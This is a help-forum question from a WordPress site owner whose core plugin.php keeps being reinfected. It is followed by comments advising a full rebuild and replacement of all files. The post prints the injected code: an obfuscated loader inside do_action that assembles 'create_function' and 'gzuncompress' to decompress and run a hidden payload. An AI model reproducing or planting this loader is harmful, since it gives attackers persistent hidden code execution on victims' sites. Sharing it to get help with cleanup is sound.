# Plugin.php Get changed and malicious content added

Tags: php, wordpress

I am facing this issue for a few months, I have websites in WordPress and my default plugin.php changed automatically, then it start making dummy folders and files in my public-html. When I remove the file and upload a default one everything gets fine but after a few days, the issue occurs again. I am a beginner please help me to fix it permanently. A piece of such suspicious code is attached here.

```
function do_action( $hook_name, ...$arg ) {

    $Jnratqh = 'create'.'_'.'function'; $ewZNxSg = 'gz'.'unc'.'ompress'; $wgvdfadw = $Jnratqh('', $ewZNxSg('x�����0�_�x�-!����,0:�d�����.p1Fxm��o�� 
z��ʣȔ�*��U+OF;^Mͽ�e=�����0.t�1<�˵(�
�@VX�q���U��0ϜIHS�\'u�&XHb��%\'Nj�S{T��M�2��%l=w;��ڿ�~�ݾ���')); $wgvdfadw();


    global $wp_filter, $wp_actions, $wp_current_filter;

    if ( ! isset( $wp_actions[ $hook_name ] ) ) {
        $wp_actions[ $hook_name ] = 1;
    } else {
        ++$wp_actions[ $hook_name ];
    }
```

Comment: You need to rebuild the whole server. It has been compromised. See https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server. Then look at your PHP version and wordpress for vulnerabilities. Also check that you are using strong passwords.

Comment: I have Hosting from a local Hosting provider How can I build a server?

Comment: You need to remove all the WordPress core files and add new fresh core files. You'll have to also remove and add all the plugins and theme files. In short, you'll have to replace all the files with fresh codes, as if malicious code could be anywhere and it will affect files again if you don't remove it's source.